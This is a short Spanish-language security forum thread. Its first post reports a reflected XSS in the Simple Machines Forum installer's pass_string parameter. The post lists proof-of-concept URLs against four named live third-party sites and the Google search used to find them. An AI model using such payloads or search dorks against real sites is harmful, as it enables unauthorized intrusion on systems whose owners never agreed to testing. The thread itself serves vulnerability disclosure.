elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Curso de javascript por TickTack


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | | |-+  XSS en el instalador de SMF
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: XSS en el instalador de SMF  (Leído 2,944 veces)
WHK
Moderador Global
***
Desconectado Desconectado

Mensajes: 6.606


Sin conocimiento no hay espíritu


Ver Perfil WWW
XSS en el instalador de SMF
« en: 19 Mayo 2008, 00:24 am »

Curosiando unos minutos encontré algunos instaladores de smf y me di cuenta que la variable  pass_string tiene XSS en método GET.

POC:
Código:
http://casa.zimzum.es/smf/install.php?obgz=1&pass_string=<h1>WHK
http://www.evolutiv.eu/SMF/install.php?&obgz=1&pass_string=<h1>WHK
http://world-eyes.fr/smf/install.php?obgz=1&pass_string=<h1>WHK
http://www.pelusonas.com/foro/install.php?obgz=1&pass_string=<h1>WHK

Fuente:
http://www.google.cl/search?hl=es&q=allinurl%3Asmf+%2B+install.php

Salu2.
« Última modificación: 19 Mayo 2008, 00:31 am por WHK » En línea

dimitrix


Desconectado Desconectado

Mensajes: 4.847



Ver Perfil WWW
Re: XSS en el instalador de SMF
« Respuesta #1 en: 19 Mayo 2008, 09:21 am »

Muy bueno, pero creo que si algún administrador no borra los archivos de instalación, ese XSS será su menor problemas XD

Muchas gracias de nuevo.
En línea




Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Instalador .net
Software
pelaows 0 1,276 Último mensaje 20 Marzo 2012, 17:00 pm
por pelaows
Instalador de S.O - USB « 1 2 »
Windows
vipamon 15 8,753 Último mensaje 26 Febrero 2013, 00:51 am
por Luna71c0
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines